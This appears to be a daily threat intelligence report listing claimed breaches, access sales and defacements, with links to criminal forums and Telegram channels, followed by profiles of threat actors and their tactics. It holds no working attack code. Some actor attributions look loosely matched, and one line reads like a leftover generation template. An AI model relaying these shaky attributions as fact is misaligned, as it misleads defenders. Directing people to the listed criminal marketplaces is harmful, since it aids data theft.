[July-05-2025] Daily Cybersecurity Threat Report

Posted on

I. Executive Summary

The cybersecurity landscape observed over the last 24 hours indicates a dynamic and increasingly complex threat environment. Analysis of recent activities reveals a notable prevalence of financially motivated attacks, alongside the persistent and evolving operations of hacktivist groups and state-aligned actors. A significant development in the threat landscape is the growing sophistication of adversary tactics, which now frequently incorporate advanced techniques such as AI-driven tools and highly refined social engineering. These methods are employed to achieve diverse objectives, ranging from large-scale data exfiltration and ransomware deployment to sophisticated espionage and the disruption of critical services across various sectors.

Key threat actor activities highlight the adaptability of malicious entities. Groups like the TA829/UNK_GreenSec cluster demonstrate a blurring of traditional lines between state-sponsored espionage and financially motivated cybercrime. The emergence of new ransomware operations, such as Hellcat (led by Pryx), underscores the continued proliferation and evolution of Ransomware-as-a-Service (RaaS) models. These trends collectively pose substantial risks, including widespread business disruption, significant financial losses, and severe reputational damage across industries such as critical infrastructure, financial services, and e-commerce.

A notable observation from recent intelligence is the increasing convergence of motives among sophisticated threat actors. Traditionally, adversaries were often categorized distinctly as either state-sponsored or purely financially driven.1 However, groups such as TA829 exemplify a hybrid model, exhibiting capabilities and objectives that span both espionage and financial gain. This Russia-aligned group, for instance, engages in activities that serve geopolitical interests while simultaneously pursuing monetary objectives through cybercrime.5 This evolving operational model implies that organizations can no longer rely on a singular defensive posture tailored to one type of adversary motivation. Instead, a comprehensive threat intelligence approach is necessitated, one that accounts for the full spectrum of potential adversary goals, even from a single entity. The ability of state interests to leverage cybercriminal capabilities for funding or deniability, and vice versa, further complicates attribution and defense, requiring a more integrated and adaptive security strategy.7

Another significant observation is the continuous proliferation and evolution of Ransomware-as-a-Service (RaaS) models. The emergence of new groups like Hellcat, led by the actor Pryx, and the activity of RA GROUP leveraging leaked Babuk ransomware source code, illustrate a rapidly expanding ecosystem.8 These RaaS operations lower the barrier to entry for aspiring cybercriminals, enabling individuals or smaller groups with less technical sophistication to deploy potent and destructive tools. The rapid development of new variants and the adoption of multi-extortion tactics, such as double extortion (stealing data before encrypting) and even triple extortion (adding threats like Distributed Denial of Service, or DDoS, attacks), signify a highly adaptable and financially driven criminal landscape.8 This dynamic environment means that even if a major ransomware group is disrupted or dismantled, new entities can quickly emerge to fill the void, often by repurposing existing tools or leaked code. Consequently, continuous monitoring of emerging ransomware variants and their associated tactics, techniques, and procedures (TTPs) is paramount, shifting the focus from merely tracking established names to understanding the underlying RaaS infrastructure and its rapid evolution.

II. Recent Cybersecurity Incidents Overview

This section provides a summary of cybersecurity incidents reported in the last 24 hours. Due to the dynamic nature of daily threat intelligence, specific incident details from the user-provided JSON will be populated here upon receipt.

  • Incident 1:
  • Summary of the Breach: The threat actor claims to be selling unauthorized access to a Pulse Secure VPN allegedly connected to a regional hospital network in the United States healthcare sector. This access could allow unauthorized entry into sensitive hospital systems, posing significant risks to patient data, healthcare operations, and overall network security.
  • Associated Threat Actor(s): XManX
  • Relevant Links:
  • Summary of the Breach: The threat actor claims to be selling a database allegedly belonging to Rekhatama. The compromised data includes sensitive personal and organizational information, such as full names, business entities, regional codes, phone numbers, email addresses, tokens, and status records.
  • Associated Threat Actor(s): RXY
  • Relevant Links:
  • Summary of the Breach: The threat actor is offering Free WordPress access to a mix of 300 WordPress sites.
  • Associated Threat Actor(s): Format
  • Relevant Links:
  • Summary of the Breach: The threat actor claims to be selling full root access to a Linux server hosted on Alibaba Cloud ECS, linked to a legitimate Shanghai-based trading company’s.org domain—which prominently displays China’s national emblem on its public license page. Marketed as ideal for long-term covert operations due to its aged infrastructure and credible domain.
  • Associated Threat Actor(s): x214
  • Relevant Links:
  • Summary of the Breach: A recent post by the group indicates that they are targeting Traffic Control Network in the United States.
  • Associated Threat Actor(s): Golden falcon
  • Relevant Links:
  • Summary of the Breach: The threat actor claims to be selling a database allegedly belonging to a UAE-based farming company. The compromised data includes 3.5GB of private and confidential information in SQL format, such as full names, addresses, company details, emails, and phone numbers.
  • Associated Threat Actor(s): DAYzer0DAY
  • Relevant Links:
  • Summary of the Breach: The group claims to defaced the website of Khyber Pakhtunkhwa Information Technology Board.
  • Associated Threat Actor(s): Team insane Pakistan
  • Relevant Links:
  • Summary of the Breach: The threat actor claims to have leaked data of Sindh Law Department. The compromised database contains 2,056 user records, including CNIC, court case info, full names, designations, dates of birth, joining and retirement, domicile, and place of posting.
  • Associated Threat Actor(s): uber
  • Relevant Links:
  • Summary of the Breach: The threat actor claims to have leaked a database allegedly belonging to Jektis Travel. The compromised data reportedly includes payment logs, reservation system records, admin account credentials and access to internal booking portals.
  • Associated Threat Actor(s): mecrobyte
  • Relevant Links:
  • Summary of the Breach: The threat actor claims to be selling a database allegedly belonging to Baggi. The compromised data repotedly contains information on 21,784 users, including personal details.
  • Associated Threat Actor(s): ParanoidHax
  • Relevant Links:
  • Summary of the Breach: The threat actor claims to be selling a large collection of gambling-related databases allegedly containing information on over 5 million international casino players. The leaked data includes both public and private player records from various online casinos, such as client names, contact details, and activity history. The data is offered for sale in multiple spreadsheet files and reportedly includes VIP player profiles.
  • Associated Threat Actor(s): BlackElite
  • Relevant Links:
  • Summary of the Breach: A recent post by the group indicates that they are targeting Kazakh Government.
  • Associated Threat Actor(s): SYLHET GANG-SG
  • Relevant Links:
  • Summary of the Breach: The threat actor claims to have fully compromised the mobile application of Morocco’s CNSS (Caisse Nationale de Sécurité Sociale). The attacker reports bypassing all security layers, including encryption, root detection, and certificate verification, exposing sensitive internal data such as Firebase configurations, API endpoints, authentication token flows, and session identifiers. The application is now reportedly vulnerable to logic abuse and API exploitation.
  • Associated Threat Actor(s): darkMods
  • Relevant Links:
  • Summary of the Breach: The threat actor claims to be selling a database allegedly belonging to Street Style Store. The compromised data reportedly includes over 1.1M coustomers records and 2.2M order entries such as names, phone numbers, email addresses, order details and more.
  • Associated Threat Actor(s): PremiumDataOnly
  • Relevant Links:
  • Summary of the Breach: The threat actor claims to have leaked data of Otter. The compromised database contains 262,000 records.
  • Associated Threat Actor(s): systemxp
  • Relevant Links:
  • Summary of the Breach: The threat actor claims to be selling a database allegedly belonging to Rolex. The compromised data includes 14.5GB of private and personal confidential information, such as client documents, budgets, payroll records, IDs, tax files, and financial data.
  • Associated Threat Actor(s): G_mic
  • Relevant Links:
  • Summary of the Breach: The threat actor claims to sell effective Anti-VM.
  • Associated Threat Actor(s): DEKAn272
  • Relevant Links:
  • Summary of the Breach: The threat actor claims to be selling the entire source code and database of PT Samisurya Indah. The database appears to contain extensive sensitive information, including usernames, passwords, email addresses, personal details (like full name, address, phone number, gender), order information, payment methods, and product data. The leaked content also includes web configuration data, suggesting the breach may have exposed both backend and frontend components of their e-commerce system
  • Associated Threat Actor(s): Putra26
  • Relevant Links:
  • Summary of the Breach: The threat actor claims to be selling a leaked Israeli government database allegedly containing the personal information of 800,000 individuals. The compromised data includes full names, phone numbers, email addresses, physical addresses, login credentials, registration dates, and payment status, among other sensitive fields. The data appears to be in structured format (CSV or similar) and includes details of citizens and possibly government-affiliated individuals.
  • Associated Threat Actor(s): DigitalGhost
  • Relevant Links:
  • Summary of the Breach: The group claims to defaced the website of My ESevai.
  • Associated Threat Actor(s): BABAYO EROR SYSTEM
  • Relevant Links:
  • Summary of the Breach: The threat actor claims to have leaked data related to Israel and Egypt.
  • Associated Threat Actor(s): Tunisian Maskers Cyber Force
  • Relevant Links:
  • Summary of the Breach: The group claims to have access to the admin panel of multiple Brazilian organizations
  • Associated Threat Actor(s): YTL
  • Relevant Links:
  • Summary of the Breach: A recent post by the group claims they are targeting critical infrastructure linked to Israeli banks. They plan to publish IP addresses, port details, and member information, along with a custom DDoS tool to facilitate coordinated attacks.
  • Associated Threat Actor(s): Assasins
  • Relevant Links:
  • Summary of the Breach: The threat actor claims to have breached Blue Bus Egypt, leaking a list of customer records with personal contact details. Some entries include national IDs or passport numbers.
  • Associated Threat Actor(s): stepbro
  • Relevant Links:
  • Summary of the Breach: The threat actor claims to be selling a user data database from Mahsoly, Egypt, containing 42,000 records. The leaked dataset includes user details such as usernames, full names (in both English and Arabic), email addresses, and Egyptian mobile numbers.
  • Associated Threat Actor(s): stepbro
  • Relevant Links:

Table 1: Daily Breach Summary

This table offers a concise, digestible overview of all reported incidents, facilitating rapid assessment for cybersecurity professionals. It enables immediate identification of impacted sectors, responsible parties, and the overall scope of the day’s events.

Incident NameVictim Sector (if available)Primary Threat Actor(s)Key ImpactPublished URLScreenshots
Alleged sale of VPN access to an unidentified Regional Hospital Network in the USAHospital & Health CareXManXUnauthorized access to Pulse Secure VPN, risks to patient data and healthcare operations.https://darkforums.st/Thread-Selling-Access-Pulse-Secure-VPNhttps://d34iuop8pidsy8.cloudfront.net/005bef94-2a9d-41fb-ae21-cbf7d05462f3.png
Alleged data breach of RekhatamaInformation Technology (IT) ServicesRXYSale of database with sensitive personal and organizational information.https://darkforums.st/Thread-Source-Code-DATA-BASE-PEMILIH-REKHATAMA-INDONESIA-536https://d34iuop8pidsy8.cloudfront.net/7a4b001d-e3dd-4a2b-8abb-1f55a3cd7863.png
Alleged access of 300 WordPress sitesFormatFree WordPress access offered to 300 sites.https://forum.exploit.in/topic/261942/https://d34iuop8pidsy8.cloudfront.net/3e4af9d0-d13d-4dfd-ac23-414b80b806ba.png
Alleged sale of access to an unidentified Shanghai-based trading companyx214Sale of full root access to Linux server on Alibaba Cloud ECS.https://xss.is/threads/141285/https://d34iuop8pidsy8.cloudfront.net/6adae0ff-0710-4e76-b737-1d409f14d02d.png, https://d34iuop8pidsy8.cloudfront.net/255a1dbb-9311-4e49-816c-71f538d5729b.png, https://d34iuop8pidsy8.cloudfront.net/ee9fce55-49b4-4b20-8a16-125dea862189.png
Golden falcon claims to target Traffic Control Network in the United StatesGolden falconTargeting Traffic Control Network in the United States.https://t.me/Golden_falcon_team/419https://d34iuop8pidsy8.cloudfront.net/1baab7f6-38ae-4b60-b094-35aba2231786.png
Alleged data leak of an unidentified UAE Farms companyAgriculture & FarmingDAYzer0DAYSale of 3.5GB database with private and confidential information.https://darkforums.st/Thread-UAE-farms-company-databasehttps://d34iuop8pidsy8.cloudfront.net/8d0581bc-37a9-4fe8-b089-918e4d32fd7c.png, https://d34iuop8pidsy8.cloudfront.net/9363c245-a778-495b-b2a1-b56b2a6e704f.png
Team insane Pakistan targets the website of Khyber Pakhtunkhwa Information Technology BoardGovernment AdministrationTeam insane PakistanWebsite defacement.https://t.me/xxl33t1337xx/70https://d34iuop8pidsy8.cloudfront.net/cf7fc923-3eba-48be-a237-fe8ef978ac8e.png
Alleged leak of Sindh Law DepartmentGovernment AdministrationuberLeaked database with 2,056 user records, including CNIC and court case info.https://kittyforums.to/thread/538?__cf_chl_tk=iYjqc4wA3_Exf1VlP_E.t2mOw8n6tduX5JojzfCF03U-1751712683-1.0.1.1-glkyVtptL6GGJzolzK7.HiPr1gAzmVJGihE5KbR.ZT4https://d34iuop8pidsy8.cloudfront.net/2f893591-a9f2-44d5-8806-181f68e84163.png
Alleged data breach of Jektis Travel Tunisian AgenceHospitality & TourismmecrobyteLeaked database with payment logs, reservation records, admin credentials.https://darkforums.st/Thread-leak-Jektis-Travel-Agencey-Of-Tunisia-DATAhttps://d34iuop8pidsy8.cloudfront.net/45765c64-c21a-4121-80f9-4fd3c63f8914.png
Alleged data breach of BaggiTransportation & LogisticsParanoidHaxSale of database with 21,784 user records, including personal details.https://darkforums.st/Thread-BaggiNepal-com-Nepal-Transport-Apphttps://d34iuop8pidsy8.cloudfront.net/6f049e37-ae4e-4ad9-a36b-30ed359f8fa3.png
Alleged data sale of Casino Players InternationalGambling & CasinosBlackEliteSale of large collection of gambling databases with over 5 million player records.https://xss.is/threads/141288/https://d34iuop8pidsy8.cloudfront.net/7873fb8f-434b-4eee-83ed-076cff481800.png, https://d34iuop8pidsy8.cloudfront.net/50fdee49-7917-480d-b018-bf298b0c3afe.png
SYLHET GANG-SG claims to target Kazakh GovernmentSYLHET GANG-SGTargeting Kazakh Government.https://t.me/SylhetGangSG1/6721https://d34iuop8pidsy8.cloudfront.net/85fa3c1d-e077-4e9d-be5a-86a03f56d75d.png
Alleged data breach of Morocco-CNSS AppGovernment & Public SectordarkModsFull compromise of mobile application, exposing sensitive internal data.https://darkforums.st/Thread-Document-Morocco-CNSS-App-Fully-Decrypted-%E2%80%93-Static-Analysis-All-Security-Layers-Bypassedhttps://d34iuop8pidsy8.cloudfront.net/553707ad-b630-447b-a68e-64182c81ef6c.png
Alleged data sale of Street Style StoreE-commerce & Online StoresPremiumDataOnlySale of database with over 1.1M customer records and 2.2M order entries.https://darkforums.st/Thread-%F0%9F%94%B4-streetstylestore-com-Customer-Sales-Database-for-Sale-1-1-Million-Customerhttps://d34iuop8pidsy8.cloudfront.net/2da24517-6908-4dbd-8b4c-65966a38c777.png
Alleged leak of Otter DatabaseRetail IndustrysystemxpLeaked database containing 262,000 records.https://forum.exploit.in/topic/261939/https://d34iuop8pidsy8.cloudfront.net/10757864-1de6-4877-a7fc-dfd493020dba.png
Alleged data sale of ROLEXLuxury Goods & JewelryG_micSale of 14.5GB database with private and confidential information.https://darkforums.st/Thread-Rolex-Full-datahttps://d34iuop8pidsy8.cloudfront.net/93b06428-ef60-4da0-8649-23e5510cf891.png
Liwaa Muhammad targets the website of Biz Hotel ApartmentsHospitality & TourismLiwaa MuhammadWebsite defacement.https://t.me/liwaamohammad/462https://d34iuop8pidsy8.cloudfront.net/d05db408-aaae-410e-8835-c862ecb045c4.png
Alleged sale of Anti-VMDEKAn272Sale of effective Anti-VM software.https://xss.is/threads/141282/https://d34iuop8pidsy8.cloudfront.net/30e87d32-d6fd-4f73-b3ff-a3cbbfa7a746.png
Alleged data breach of PT. SAMISURYAINDAHManufacturingPutra26Sale of entire source code and database with extensive sensitive information.https://darkforums.st/Thread-Source-Code-PT-SAMISURYA-INDAH-WWW-SAMISURYA-CO-IDhttps://d34iuop8pidsy8.cloudfront.net/4785089b-290e-469f-9de6-159d154c4e5d.png
Alleged data breach of Israel National Digital AgencyGovernment AdministrationDigitalGhostSale of leaked Israeli government database with 800,000 personal records.https://darkforums.st/Thread-800K-GOV-IL-DATABASEhttps://d34iuop8pidsy8.cloudfront.net/a8dee479-c30b-4343-ae59-0165c0a35aa2.png, https://d34iuop8pidsy8.cloudfront.net/d73da93a-c9d8-4bf4-80d9-887fd9ff77ac.png
Babayo Eror System targets the website of My ESevaiGovernment AdministrationBABAYO EROR SYSTEMWebsite defacement.https://t.me/CyberBabayoEror/751https://d34iuop8pidsy8.cloudfront.net/edec6a8e-68b3-4ee4-8d96-68bf4c59ccbc.png
Alleged data leak of Israel and EgyptTunisian Maskers Cyber ForceLeaked data related to Israel and Egypt.https://t.me/CyberforceTn/272https://d34iuop8pidsy8.cloudfront.net/09ac83b4-e295-423e-b12e-fc05134e367a.png
Alleged leak of admin access to multiple Brazilian organizationsYTLAccess to admin panel of multiple Brazilian organizations.https://ramp4u.io/threads/2-000-to-25-000-rewards-for-hacking-the-sites-in-this-topic-%D0%9D%D0%B0%D0%B3%D1%80%D0%B0%D0%B4%D1%8B-%D0%B7%D0%B0-%D0%B2%D0%B7%D0%BB%D0%BE%D0%BC-%D1%81%D0%B0%D0%B9%D1%82%D0%BE%D0%B2-%D0%B2-%D1%8D%D1%82%D0%BE%D0%B9-%D1%82%D0%B5%D0%BC%D0%B5.3253/https://d34iuop8pidsy8.cloudfront.net/b8ca9d9c-8d13-4a2f-b1c3-0256e4c42833.jpg
Assasins claim to target Israeli banking infrastructureFinancial ServicesAssasinsTargeting critical infrastructure linked to Israeli banks, planning to publish IP addresses and DDoS tool.https://t.me/Assasins_Official/74https://d34iuop8pidsy8.cloudfront.net/7a721c36-7536-4c4d-bcf0-a72e6679298d.png
Alleged data breach of Blue BusTransportation & LogisticsstepbroLeaked customer records with personal contact details, including national IDs.https://xss.is/threads/141275/https://d34iuop8pidsy8.cloudfront.net/80db0cfb-c178-4ad6-9157-51dd6718d033.png, https://d34iuop8pidsy8.cloudfront.net/ecb2c40c-9993-41f5-a4fe-c841032818da.png
Alleged data breach of Mahsoly EgyptGovernment AdministrationstepbroSale of user data database with 42,000 records, including personal details.https://xss.is/threads/141276/https://d34iuop8pidsy8.cloudfront.net/163029ec-6348-40ad-adb7-f0ed9c892a71.png

III. In-Depth Threat Actor Profiles

This section provides detailed profiles of the unique threat actors identified in recent incidents, offering comprehensive context on their operations, motivations, and historical activities.

Threat Actor: TA829 / UNK_GreenSec

TA829, also known by aliases such as CIGAR, Nebulous Mantis, Storm-0978, Tropical Scorpius, UAC-0180, UAT-5647, UNC2596, and Void Rabisu, is a Russia-aligned hybrid group that stands out in the threat landscape due to its dual capacity for both espionage and financially motivated attacks.5 UNK_GreenSec is a cluster name associated with activities that show significant overlap with TA829, suggesting a close relationship, possibly as an infrastructure provider that occasionally deploys its own malware, or even as a new facet of the same entity.5

The primary motivations for TA829 appear to be a blend of geopolitical objectives, aligning with Russian state interests for espionage, and direct financial gain through cybercriminal operations.5 This hybrid approach allows the group to pursue diverse strategic goals while potentially self-funding its operations or providing deniability for state-sponsored activities.

The group’s tactics, techniques, and procedures (TTPs) are characterized by sophisticated initial access methods. They heavily rely on elaborate phishing campaigns, which involve plaintext email messages, actor-controlled domains, and redirectors that lead targets to spoofed cloud storage landing pages, such as fake Google Drive or Microsoft OneDrive interfaces.5 To facilitate these large-scale campaigns, they utilize REM Proxy services for email routing and freemail providers for bulk message dissemination, often employing generic sender address patterns to automate the process.5 Beyond phishing, TA829 is also known for exploiting zero-day vulnerabilities in widely used platforms like Mozilla Firefox and Microsoft Windows to gain initial footholds.5

Once initial access is established, TA829 and UNK_GreenSec employ living-off-the-land (LOTL) tactics, leveraging legitimate system tools to blend in with normal network activity.5 They maintain persistence and control through encrypted command-and-control (C2) communications and utilize tools such as Putty’s PLINK to set up SSH tunnels, further obfuscating their network traffic. Payload delivery and subsequent activities often involve IPFS (InterPlanetary File System) for hosting utilities, making detection more challenging.5 Evasion techniques are also central to their operations; UNK_GreenSec, in particular, has been observed using improved filtering and obfuscation measures, including server-side filtering via Cloudflare services, a tactic later adopted by TA829, to thwart automated analysis by security researchers.6

Historically, TA829’s campaigns have shown increasing frequency and sophistication since February 2025.6 UNK_GreenSec first came to light in February 2025, when it was documented delivering Morpheus ransomware, a rebranded version of HellCat ransomware, against an American law firm.5 The malware arsenal associated with this cluster includes RomCom RAT, DustyHammock, TransferLoader (which delivers Morpheus ransomware), MeltingClaw (also known as DAMASCENED PEACOCK), RustyClaw, ShadyHammock, and SingleCamper (an updated version of RomCom RAT, also known as SnipBot).5 The shared TTPs and infrastructure between TA829 and UNK_GreenSec suggest a very likely link between the groups, whether as collaborators, shared resource users, or a single evolving entity.5

Threat Actor: LAPSUS$

LAPSUS$, also identified by Microsoft as Strawberry Tempest, is an international extortion-focused hacker group that has gained notoriety for its cyberattacks against major technology companies and government agencies.13 The group’s activities have been observed across multiple countries, with arrests of members reported in Brazil and the UK in 2022.14

LAPSUS$ is primarily motivated by financial extortion, seeking to obtain sensitive data and then demanding ransom to prevent its public release.14 Their operational model centers on gaining initial access to a victim organization’s corporate network by acquiring credentials from privileged employees. This is achieved through a variety of attack vectors, including social engineering, multi-factor authentication (MFA) fatigue attacks, and SIM swapping.13 Once credentials are obtained, the group leverages remote desktop tools to navigate within the compromised network and exfiltrate sensitive information.14 In some instances, they have been observed creating new global administrator accounts or virtual machines as tooling servers to further their attacks and hinder recovery efforts.13 They have also established organization-wide email transport rules to redirect emails to attacker-controlled accounts and removed other global administrator accounts to impede victim recovery.13

Notable incidents attributed to LAPSUS$ include breaches against Brazil’s Ministry of Health (2021), where they exfiltrated and deleted 50 TB of data, and attacks on Okta (2022), Nvidia (2022), and Samsung (2022).14 The attack on Uber in September 2022, for instance, involved a successful phishing campaign that allowed the attacker to gain high-privilege credentials and compromise multiple internal services and tools, with the attacker publicly sharing screenshots of the compromised systems.13 Despite being considered inactive by April 2022, the group reportedly re-emerged in September 2022 with a new series of data breaches, though subsequent arrests may have led to members dispersing to other groups.14

Threat Actor: Magecart

Magecart refers to a collective of multiple hacker groups specializing in online skimming techniques, primarily aimed at stealing customer details and credit card information from websites that process online payments.16 The name itself is derived from their initial focus on the Magento e-commerce platform, which provides shopping cart functionality.17

The primary motivation behind Magecart attacks is financial gain through the theft and subsequent sale of payment card data and personally identifiable information (PII).17 These groups are persistent and have diversified their methods and targets over time. Initially, they focused exclusively on Magento vulnerabilities, but their operations have expanded to other e-commerce platforms and third-party services.18

Magecart groups employ various TTPs, with formjacking (digital skimming) being their predominant method.17 This involves injecting malicious code, often JavaScript skimmers, directly into e-commerce checkout pages. This malicious code is designed to capture payment card details as customers enter them. Attackers have innovated their injection techniques, including embedding skimmer code within image files to mimic legitimate “favicons” or modifying file paths to load malicious PHP web shell scripts on compromised servers.18 This server-side injection makes detection more difficult. They also create convincing fraudulent modal forms or fake checkout pages that perfectly mimic legitimate ones, sometimes even offering a smoother user experience than the original, to trick victims into submitting their details.16 After capturing the data, a fake error message might be displayed, and the user is redirected to the real payment URL, often unaware of the compromise.16 To evade detection and ensure persistence, Magecart actors use obfuscated source code, pool IP addresses, and implement hidden system processes to restore skimmer code if it is removed.18

Notable organizations targeted by Magecart include Magento, British Airways, Amazon S3 Buckets, and Hanna Anderson.17 The British Airways breach, for example, involved copying and modifying JavaScript payment forms to exfiltrate data to attacker-controlled servers, affecting both website and mobile application users.17 The persistence of Magecart attacks, which often go unnoticed until stolen credit cards appear on the dark web, underscores the importance of robust security measures for e-commerce platforms, including MFA for admin panels, secure iFrames for transactions, and regular security audits.17

Threat Actor: Pryx (Hellcat Ransomware)

Pryx is a notable threat actor who operates as both a malware/ransomware developer and an identity access broker.8 Active on cybercrime forums such as XSS since June 2024 and occasionally BreachForums, Pryx has quickly established a reputation within the cybercrime community.8 This actor has also used the aliases “HolyPryx” and “Sp1d3r” (though not to be confused with another actor using similar aliases).8

Pryx’s motivations are primarily financial, but they also exhibit political leanings, particularly an anti-Israel stance, and have stated a focus on the government sector.8 This blend of financial opportunity and political motivation influences their target selection, aiming for both monetary gain and notoriety within the cybercrime community.8

A significant development in Pryx’s activities is the formation of the Hellcat ransomware group in October 2024.8 Hellcat employs a double-extortion tactic, first exfiltrating sensitive data from victims before encrypting their systems. This method allows them to demand a higher ransom by threatening to release the stolen information publicly.8 The group selects targets based on financial opportunity and political motives, seeking to establish themselves as notorious and reputable actors.8

Beyond ransomware, Pryx has contributed to malware development, notably with a write-up on what they describe as “the first server-side stealer in the world”.8 This novel malware operates by setting up a secret Tor service directly on a compromised machine, which then covertly hosts stolen data. This approach minimizes the malware’s footprint and operational noise, reducing the risk of detection by avoiding traditional data exfiltration network trails and leveraging Tor for anonymity.8 This innovation highlights Pryx’s technical sophistication and their focus on stealthy data theft.

Threat Actor: Iran-based Malicious Cyber Actor (Associated with XManX query)

While the term “XManX” is not directly defined as a specific threat actor in the provided material, the associated research points to two distinct but potentially related areas: the emergence of AI-powered hacking tools and an Iran-based malicious cyber actor. This section will focus on the latter, as it represents a defined threat actor group.

This Iran-based malicious cyber actor has been observed conducting widespread campaigns targeting various industries, including information technology, government, healthcare, financial, insurance, and media sectors across the United States.19 Their motivations appear to be a combination of supporting Iranian government interests, potentially operating as a contractor, and pursuing their own financial gains by selling access to compromised network infrastructure on online hacker forums.19 The group also possesses the capability and likely the intent to deploy ransomware on victim networks.19

The TTPs of this actor often begin with mass-scanning activities using tools like Nmap to identify open ports.19 Initial access is primarily gained by exploiting publicly known Common Vulnerabilities and Exposures (CVEs) related to remote external services on internet-facing assets, particularly VPN infrastructure.19 Specific vulnerabilities exploited include those in Pulse Secure VPN (CVE-2019-11510, CVE-2019-11539), Citrix NetScaler (CVE-2019-19781), and F5 (CVE-2020-5902).19

After gaining initial access, the actor focuses on obtaining administrator-level credentials and establishing persistence within the network, often for several months.19 They achieve this by installing web shells (such as ChunkyTuna, Tiny, and China Chopper) and heavily relying on open-source and operating system (OS) tooling like ngrok and fast reverse proxy (FRP).19 Their primary goals once inside a network appear to be maintaining persistence and exfiltrating data.19

It is important to note that the emergence of advanced AI-powered hacking tools, such as Xanthorox AI, presents a significant force-multiplication for adversaries.20 While not directly attributed to this specific Iran-based actor in the provided material, such tools are plausible and available, enabling capabilities like malicious code generation, vulnerability exploitation, data analysis, and sophisticated phishing message creation.20 The dual nature of AI as both a threat and a defensive tool underscores the need for organizations to embrace AI to enhance their own security capabilities against evolving threats.20

Threat Actor: DustSquad / Golden Falcon

Golden Falcon is an alias for the cyberespionage group known as DustSquad, also identified as APT-C-34 and Nomadic Octopus.21 This group is Russia-aligned and has been active since at least 2014.21

The primary motivation of DustSquad/Golden Falcon is information theft and espionage.21 They specifically target Central Asian users and diplomatic entities, with reported operations in countries like Afghanistan and Kazakhstan.21 Their objectives align with state-sponsored activities, seeking to gather intelligence and sensitive information from government, defense, media, and diplomatic sectors, as well as from dissidents.21

Their operations have involved custom Android and Windows malware, including a malicious program for Windows known as “Octopus”.21 This malware was initially named by ESET in 2017 after a script (“0ct0pus3.php”) found on the actor’s old C2 servers.21 Kaspersky’s attribution engine has linked Octopus to DustSquad, with campaigns traced back to 2014 in former Soviet republics of Central Asia.21 One notable operation documented is the “Nomadic Octopus’ Paperbug Campaign” in 2020.21

Threat Actor: Team Insane PK

Team Insane PK is a hacktivist group known for its activities in religious hacktivism, allegedly based out of Pakistan.22 The group has gained notoriety for numerous cyberattacks, primarily targeting Indian businesses and government websites.22 They have expressed solidarity with Iran and are associated with other hacktivist collectives such as DieNet, Mysterious Team Bangladesh, Z-Alliance, Server Killers, Akatsuki Cyber Team, GhostSec, Keymous+, Inteid, Anonymous Kashmir, and Mr Hamza Cyber Force.23

Team Insane PK’s motivations are driven by religious ideologies, aligning with a concept of “digital jihad” to promote a specific belief system or discredit others.22 Their actions highlight the increasing prominence of non-state actors in cyber warfare, using digital tools to advance their agendas.22

Their primary tactic involves Distributed Denial of Service (DDoS) attacks, which aim to overwhelm a target network with traffic, rendering it inaccessible.22 They have also engaged in website defacement and basic data leaks, often sourcing data from compromised credentials or misconfigured systems.24 These attacks frequently feature religiously motivated messages.22 Since early 2023, the group has shown significant activity targeting Indian digital infrastructure, including educational institutes, telecommunications, manufacturing companies, and national archives.22 While their technical sophistication may be basic, their actions are driven by real-world events and perceived injustices, often leading to exaggerated claims of breaches for media attention.24

Threat Actor: DarkEngine (Associated with darkMods query)

While “darkMods” is not directly identified as a specific threat actor name in the provided material, the information associated with this query extensively describes the “DarkEngine” campaign. This campaign is attributed to a capable financially-motivated threat actor.

The DarkEngine campaign has been active since at least June 2024 and primarily targets WP Engine, a popular web hosting platform for WordPress websites.25 The actor’s motivation is financial gain, and they demonstrate a significant level of resource investment and capability.25

The TTPs of the DarkEngine campaign involve a multi-stage approach, often leveraging search engine optimization (SEO) poisoning and Google sponsored advertisements to direct users to replica clones of the legitimate WP Engine website.25 This allows the threat actor to steal WP Engine login credentials. By compromising WP Engine accounts, the actor can scale their malicious activities, gaining access to dozens or even hundreds of hosted WordPress sites simultaneously, rather than targeting them individually.25

Once access is gained, the threat actor infects hosted WordPress sites with a backdoor plugin, granting them administrator access and the ability to inject malicious scripts.25 These scripts lead to the delivery of malware to website visitors through fake CAPTCHA prompts, a variation of the ClickFix social engineering technique designed to manipulate users into running malicious commands.25 The campaign has been linked to the delivery of malware such as Yet Another NodeJS Backdoor (YaNB), KongTuke, LandUpdate808 (also referred to as UNC5518), and TAG-1242.25 Similar activity clusters have been associated with Rhysida ransomware, Interlock ransomware, SocGholish, and Asylum Ambuscade operators.25 CyberCX has identified at least 2,353 unique websites potentially compromised by this threat actor, including 82 in Australia and New Zealand, and at least 28 compromised WP Engine credentials.25

Threat Actor: WIP26 (PremiumDataOnly query)

The “PremiumDataOnly” query is associated with the threat activity tracked as WIP26. WIP26 is an espionage-focused threat actor that has been observed targeting telecommunication providers in the Middle East.26

The primary motivation for WIP26 is espionage, driven by the sensitive data held by communication providers, which are frequent targets for intelligence gathering.26

WIP26’s TTPs are characterized by the abuse of public cloud infrastructure for various stages of their operations, including malware delivery, data exfiltration, and command-and-control (C2).26 They leverage services such as Microsoft 365 Mail, Google Firebase, Microsoft Azure, and Dropbox to blend their malicious traffic with legitimate network activity, making detection more challenging.26

The initial intrusion vector involves precision targeting through WhatsApp messages containing Dropbox links to a malware loader.26 Tricking employees into executing this loader leads to the deployment of backdoors, dubbed CMD365 and CMDEmber, which then utilize Microsoft 365 Mail and Google Firebase instances for C2 communications.26 Data exfiltration, including users’ private browser data and reconnaissance information on high-value hosts, is orchestrated through PowerShell commands to Microsoft Azure instances.26 The threat actor has used specific Azure websites for malware hosting and data exfiltration.26 They also employ open-source tools like Chisel, masquerading as legitimate applications, to create TCP tunnels over HTTP.26 WIP26 has made operational security (OPSEC) errors, such as leaving a publicly accessible JSON file on their Google Firebase C2 server, providing further insights into their activities.26

Threat Actor: STAC5777 / STAC5143 (Associated with systemxp query)

While “systemxp” is not directly identified as a specific threat actor name in the provided material, the associated research describes two distinct groups of threat actors, STAC5777 and STAC5143, that have been actively exploiting Microsoft’s Office 365 platform.

These groups are likely motivated by data theft and ransomware deployment.27 Their operations highlight the risks associated with cloud service configurations and social engineering.

Their TTPs involve operating their own Microsoft Office 365 service tenants and exploiting a default Microsoft Teams configuration that permits external users to initiate chats or meetings with internal users.27 This allows them to engage in vishing (voice phishing) attacks. During these calls, the threat actor instructs employees to allow remote screen control sessions via Teams.27 Through these remote sessions, the attackers open command shells, drop and execute malware from external SharePoint file stores, and deploy legitimate Java runtimes (javaw.exe) to execute malicious JAR files.27 They also utilize legitimate Microsoft-signed executables like OneDriveStandaloneUpdater.exe, alongside unsigned OpenSSL DLLs and an unknown DLL (winhttp.dll), to deploy their payloads.27

